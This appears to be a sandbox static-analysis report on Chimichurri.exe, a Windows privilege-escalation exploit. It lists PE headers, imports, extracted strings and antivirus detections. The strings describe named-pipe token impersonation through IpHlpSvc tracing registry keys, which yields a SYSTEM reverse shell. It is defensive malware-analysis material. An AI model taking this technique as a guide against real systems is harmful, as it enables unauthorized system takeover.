Static | ZeroBOX

PE Compile Time

2015-05-24 17:26:26

PDB Path

D:\Users\Carsten\Chimichurri\Release\Chimichurri.pdb

PE Imphash

10d5eed2875d69cbd6ec9676c4e8c440

Sections

Name    Virtual Address  Virtual Size  Size of Raw Data  Entropy
.text   0x00001000       0x0000e2db    0x0000e400        6.65450883944
.rdata  0x00010000       0x00006a00    0x00006a00        4.80715450218
.data   0x00017000       0x00003240    0x00001400        3.66857458973
.rsrc   0x0001b000       0x000001e0    0x00000200        4.71006138269
.reloc  0x0001c000       0x00001240    0x00001400        6.26984230096

Resources

Name         Offset      Size        Language      Sub-language        File type
RT_MANIFEST  0x0001b060  0x0000017d  LANG_ENGLISH  SUBLANG_ENGLISH_US  XML 1.0 document text

Imports

Library KERNEL32.dll:
0x410020 GetCurrentThread
0x410024 CreateThread
0x410028 CreateEventA
0x41002c WaitForSingleObject
0x410030 SetEvent
0x410034 ConnectNamedPipe
0x410038 CloseHandle
0x41003c CreateNamedPipeA
0x410044 WriteConsoleW
0x410048 SetStdHandle
0x41004c SetFilePointerEx
0x410050 GetConsoleMode
0x410054 GetConsoleCP
0x410058 FlushFileBuffers
0x41005c GetStringTypeW
0x410060 HeapAlloc
0x410064 EncodePointer
0x410068 DecodePointer
0x41006c RaiseException
0x410070 RtlUnwind
0x410074 GetCommandLineA
0x410078 GetLastError
0x41007c ExitProcess
0x410080 GetModuleHandleExW
0x410084 GetProcAddress
0x410088 MultiByteToWideChar
0x41008c WideCharToMultiByte
0x410090 GetStdHandle
0x410094 WriteFile
0x410098 GetModuleFileNameW
0x41009c GetProcessHeap
0x4100a0 IsDebuggerPresent
0x4100b0 HeapFree
0x4100b4 HeapSize
0x4100b8 SetLastError
0x4100bc GetCurrentThreadId
0x4100c0 GetFileType
0x4100c8 GetStartupInfoW
0x4100cc GetModuleFileNameA
0x4100d4 GetCurrentProcessId
0x4100e4 IsValidCodePage
0x4100e8 GetACP
0x4100ec GetOEMCP
0x4100f0 GetCPInfo
0x410100 Sleep
0x410104 GetCurrentProcess
0x410108 TerminateProcess
0x41010c TlsAlloc
0x410110 TlsGetValue
0x410114 TlsSetValue
0x410118 TlsFree
0x41011c GetModuleHandleW
0x410120 LoadLibraryExW
0x410124 OutputDebugStringW
0x410128 LCMapStringW
0x41012c HeapReAlloc
0x410130 CreateFileW
Library ADVAPI32.dll:
0x410000 RegOpenKeyExA
0x410004 RegCloseKey
0x41000c DuplicateTokenEx
0x410010 OpenThreadToken
0x410018 RegSetValueExA
Library WS2_32.dll:
0x410138 WSAStartup
0x41013c inet_addr
0x410140 htons
0x410144 connect
0x410148 bind
0x41014c WSASocketA

!This program cannot be run in DOS mode.
/Chimichurri/-->Could not connect to %s<BR>
WinSta0\Default
comspec
\\localhost\pipe\x
%windir%\tracing
SOFTWARE\Microsoft\Tracing\IpHlpSvc
FileDirectory
EnableFileTracing
\\.\pipe\x\IpHlpSvc.log
/Chimichurri/-->Couldn't create pipe<BR>
/Chimichurri/-->Error impersonating pipe<BR>
/Chimichurri/-->Couldn't get token<BR>
/Chimichurri/-->Got SYSTEM token...<BR>
/Chimichurri/-->Running reverse shell...<BR>
/Chimichurri/-->This exploit gives you a Local System shell <BR>
/Chimichurri/-->Usage: Chimichurri.exe ipaddress port <BR>
/Chimichurri/-->Changing registry values...<BR>
/Chimichurri/-->Couldn't set registry values<BR>
/Chimichurri/-->Restoring default registry values...<BR>
generic
unknown error
iostream
iostream stream error
system
string too long
invalid string position
bad allocation
permission denied
file exists
no such device
filename too long
device or resource busy
io error
directory not empty
invalid argument
no space on device
no such file or directory
function not supported
no lock available
not enough memory
resource unavailable try again
cross device link
operation canceled
too many files open
permission_denied
address_in_use
address_not_available
address_family_not_supported
connection_already_in_progress
bad_file_descriptor
connection_aborted
connection_refused
connection_reset
destination_address_required
bad_address
host_unreachable
operation_in_progress
interrupted
invalid_argument
already_connected
too_many_files_open
message_size
filename_too_long
network_down
network_reset
network_unreachable
no_buffer_space
no_protocol_option
not_connected
not_a_socket
operation_not_supported
protocol_not_supported
wrong_protocol_type
timed_out
operation_would_block
address family not supported
address in use
address not available
already connected
argument list too long
argument out of domain
bad address
bad file descriptor
bad message
broken pipe
connection aborted
connection already in progress
connection refused
connection reset
destination address required
executable format error
file too large
host unreachable
identifier removed
illegal byte sequence
inappropriate io control operation
invalid seek
is a directory
message size
network down
network reset
network unreachable
no buffer space
no child process
no link
no message available
no message
no protocol option
no stream resources
no such device or address
no such process
not a directory
not a socket
not a stream
not connected
not supported
operation in progress
operation not permitted
operation not supported
operation would block
owner dead
protocol error
protocol not supported
read only file system
resource deadlock would occur
result out of range
state not recoverable
stream timeout
text file busy
timed out
too many files open in system
too many links
too many symbolic link levels
value too large
wrong protocol type
Unknown exception
CorExitProcess
(null)
`h````
xpxxxx
_hypot
_nextafter
bad exception
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
August
September
October
November
December
MM/dd/yy
dddd, MMMM dd, yyyy
HH:mm:ss
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
InitializeCriticalSectionEx
CreateEventExW
CreateSemaphoreExW
SetThreadStackGuarantee
CreateThreadpoolTimer
SetThreadpoolTimer
WaitForThreadpoolTimerCallbacks
CloseThreadpoolTimer
CreateThreadpoolWait
SetThreadpoolWait
CloseThreadpoolWait
FlushProcessWriteBuffers
FreeLibraryWhenCallbackReturns
GetCurrentProcessorNumber
GetLogicalProcessorInformation
CreateSymbolicLinkW
SetDefaultDllDirectories
EnumSystemLocalesEx
CompareStringEx
GetDateFormatEx
GetLocaleInfoEx
GetTimeFormatEx
GetUserDefaultLocaleName
IsValidLocaleName
LCMapStringEx
GetCurrentPackageId
GetTickCount64
GetFileInformationByHandleExW
SetFileInformationByHandleW
MessageBoxW
GetActiveWindow
GetLastActivePopup
GetUserObjectInformationW
GetProcessWindowStation
`h`hhh
xppwpp
__based(
__cdecl
__pascal
__stdcall
__thiscall
__fastcall
__vectorcall
__clrcall
__eabi
__ptr64
__restrict
__unaligned
restrict(
delete
operator
`vftable'
`vbtable'
`vcall'
`typeof'
`local static guard'
`string'
`vbase destructor'
`vector deleting destructor'
`default constructor closure'
`scalar deleting destructor'
`vector constructor iterator'
`vector destructor iterator'
`vector vbase constructor iterator'
`virtual displacement map'
`eh vector constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`copy constructor closure'
`udt returning'
`local vftable'
`local vftable constructor closure'
new[]
delete[]
`omni callsig'
`placement delete closure'
`placement delete[] closure'
`managed vector constructor iterator'
`managed vector destructor iterator'
`eh vector copy constructor iterator'
`eh vector vbase copy constructor iterator'
`dynamic initializer for '
`dynamic atexit destructor for '
`vector copy constructor iterator'
`vector vbase copy constructor iterator'
`managed vector copy constructor iterator'
`local static thread guard'
Type Descriptor'
Base Class Descriptor at (
Base Class Array'
Class Hierarchy Descriptor'
Complete Object Locator'
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
1#SNAN
1#QNAN
D:\Users\Carsten\Chimichurri\Release\Chimichurri.pdb
GetEnvironmentVariableA
CloseHandle
ConnectNamedPipe
SetEvent
WaitForSingleObject
CreateEventA
CreateThread
GetCurrentThread
CreateNamedPipeA
KERNEL32.dll
ImpersonateNamedPipeClient
OpenThreadToken
DuplicateTokenEx
CreateProcessAsUserA
RegCloseKey
RegOpenKeyExA
RegSetValueExA
ADVAPI32.dll
WSASocketA
WS2_32.dll
HeapAlloc
EncodePointer
DecodePointer
RaiseException
RtlUnwind
GetCommandLineA
GetLastError
ExitProcess
GetModuleHandleExW
GetProcAddress
MultiByteToWideChar
WideCharToMultiByte
GetStdHandle
WriteFile
GetModuleFileNameW
GetProcessHeap
IsDebuggerPresent
IsProcessorFeaturePresent
EnterCriticalSection
LeaveCriticalSection
HeapFree
HeapSize
SetLastError
GetCurrentThreadId
GetFileType
DeleteCriticalSection
GetStartupInfoW
GetModuleFileNameA
QueryPerformanceCounter
GetCurrentProcessId
GetSystemTimeAsFileTime
GetEnvironmentStringsW
FreeEnvironmentStringsW
IsValidCodePage
GetACP
GetOEMCP
GetCPInfo
UnhandledExceptionFilter
SetUnhandledExceptionFilter
InitializeCriticalSectionAndSpinCount
GetCurrentProcess
TerminateProcess
TlsAlloc
TlsGetValue
TlsSetValue
TlsFree
GetModuleHandleW
LoadLibraryExW
OutputDebugStringW
LCMapStringW
HeapReAlloc
GetStringTypeW
FlushFileBuffers
GetConsoleCP
GetConsoleMode
SetFilePointerEx
SetStdHandle
WriteConsoleW
CreateFileW
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
.?AVerror_category@std@@
.?AV_Generic_error_category@std@@
.?AV_Iostream_error_category@std@@
.?AV_System_error_category@std@@
.?AVbad_alloc@std@@
.?AVexception@std@@
.?AVlogic_error@std@@
.?AVlength_error@std@@
.?AVout_of_range@std@@
.?AVtype_info@@
.?AVbad_exception@std@@
<?xml version='1.0' encoding='UTF-8' standalone='yes'?>
<assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel level='asInvoker' uiAccess='false' />
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
mscoree.dll
AR6002
- floating point support not loaded
- not enough space for arguments
- not enough space for environment
- abort() has been called
- not enough space for thread data
- unexpected multithread lock error
- unexpected heap error
- unable to open console device
- not enough space for _onexit/atexit table
- pure virtual function call
- not enough space for stdio initialization
- not enough space for lowio initialization
- unable to initialize heap
- CRT not initialized
- Attempt to initialize the CRT more than once.
This indicates a bug in your application.
- not enough space for locale information
- Attempt to use MSIL code from this assembly during native code initialization
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
- inconsistent onexit begin-end variables
DOMAIN error
SING error
TLOSS error
runtime error
Runtime Error!
Program:
<program name unknown>
Microsoft Visual C++ Runtime Library
(null)
Aja-JP
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
August
September
October
November
December
MM/dd/yy
dddd, MMMM dd, yyyy
HH:mm:ss
kernel32.dll
WUSER32.DLL
zh-CHS
az-AZ-Latn
uz-UZ-Latn
kok-IN
syr-SY
div-MV
quz-BO
sr-SP-Latn
az-AZ-Cyrl
uz-UZ-Cyrl
quz-EC
sr-SP-Cyrl
quz-PE
smj-NO
bs-BA-Latn
smj-SE
sr-BA-Latn
sma-NO
sr-BA-Cyrl
sma-SE
sms-FI
smn-FI
zh-CHT
az-az-cyrl
az-az-latn
bs-ba-latn
div-mv
kok-in
quz-bo
quz-ec
quz-pe
sma-no
sma-se
smj-no
smj-se
smn-fi
sms-fi
sr-ba-cyrl
sr-ba-latn
sr-sp-cyrl
sr-sp-latn
syr-sy
uz-uz-cyrl
uz-uz-latn
zh-chs
zh-cht
((((( H
((((( H
CONOUT$
Antivirus Signature
Bkav Clean
Lionic Clean
tehtris Clean
ClamAV Clean
CMC Clean
CAT-QuickHeal Clean
Skyhigh Clean
ALYac Clean
Cylance Clean
Zillya Clean
Sangfor Clean
K7AntiVirus Clean
Alibaba Clean
K7GW Clean
Cybereason Clean
huorong HackTool/IIS.a
Baidu Clean
VirIT Clean
Paloalto Clean
Symantec Clean
Elastic Clean
ESET-NOD32 Clean
APEX Clean
Avast Clean
Cynet Clean
Kaspersky Clean
BitDefender Clean
NANO-Antivirus Clean
ViRobot Clean
MicroWorld-eScan Clean
Tencent Clean
TACHYON Clean
Sophos Clean
F-Secure Clean
DrWeb Clean
VIPRE Clean
TrendMicro Clean
McAfeeD Clean
Trapmine Clean
FireEye Clean
Emsisoft Clean
Ikarus Win32.Outbreak
GData Clean
Jiangmin Clean
Webroot Clean
Varist Clean
Avira Clean
Antiy-AVL Clean
Kingsoft Clean
Gridinsoft Clean
Xcitium Clean
Arcabit Clean
SUPERAntiSpyware Clean
ZoneAlarm Clean
Microsoft Clean
Google Clean
AhnLab-V3 Clean
Acronis Clean
McAfee Clean
MAX Clean
VBA32 Clean
Malwarebytes Clean
Panda Clean
Zoner Clean
TrendMicro-HouseCall Clean
Rising Clean
Yandex Clean
SentinelOne Clean
MaxSecure Clean
Fortinet Clean
BitDefenderTheta Gen:NN.ZexaF.36810.fuW@aWLp!7oi
AVG Clean
DeepInstinct Clean
CrowdStrike win/malicious_confidence_100% (W)
alibabacloud HackTool:Win/IIS.AZ
No IRMA results available.